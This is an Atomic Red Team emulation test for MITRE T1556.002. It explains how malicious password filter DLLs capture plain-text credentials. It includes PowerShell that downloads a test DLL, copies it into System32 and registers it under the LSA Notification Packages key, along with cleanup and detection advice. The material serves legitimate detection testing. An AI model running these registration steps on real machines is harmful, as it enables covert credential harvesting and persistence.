# T1556.002 - Password Filter DLL
Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated. 

Windows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as DLLs containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts. Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation. 

Adversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made.(Citation: Carnal Ownage Password Filters Sept 2013)

## Atomic Tests

### Atomic Test #1 - Install and Register Password Filter DLL
Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges.
The binary in bin is https://www.virustotal.com/gui/file/95140c1ad39fd632d1c1300b246293297aa272ce6035eecc3da56e337200221d/detection
Source is in src folder. 
This does require a reboot to see the filter loaded into lsass.exe. 
It does require Administrative privileges to import the clean registry values back into LSA, it is possible you may have to manually do this after for cleanup.

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: AtomicRedTeamPWFilter.dll must exist on disk at specified location (#{dll_path}\#{dll_name})

##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\T1556.002\bin\AtomicRedTeamPWFilter.dll") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/redcanaryco/atomicredteam/atomics/T1556.002/bin/AtomicRedTeamPWFilter.dll" -OutFile "PathToAtomicsFolder\T1556.002\bin\AtomicRedTeamPWFilter.dll"

```

In [ ]:
Invoke-AtomicTest T1556.002 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
reg.exe export HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ "PathToAtomicsFolder\T1556.002\lsa_backup.reg"
$passwordFilterName = (Copy-Item "PathToAtomicsFolder\T1556.002\bin\AtomicRedTeamPWFilter.dll" -Destination "C:\Windows\System32" -PassThru).basename
$lsaKey = Get-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\"
$notificationPackagesValues = $lsaKey.GetValue("Notification Packages")
$notificationPackagesValues += $passwordFilterName
Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" "Notification Packages" $notificationPackagesValues
```

In [ ]:
Invoke-AtomicTest T1556.002 -TestNumbers 1

#### Cleanup: 
```powershell
reg.exe import "PathToAtomicsFolder\T1556.002\lsa_backup.reg"
remove-item C:\Windows\System32\AtomicRedTeamPWFilter.dll
```

In [ ]:
Invoke-AtomicTest T1556.002 -TestNumbers 1 -Cleanup

## Detection
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>) and correlate then investigate the DLL files these files reference.

Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)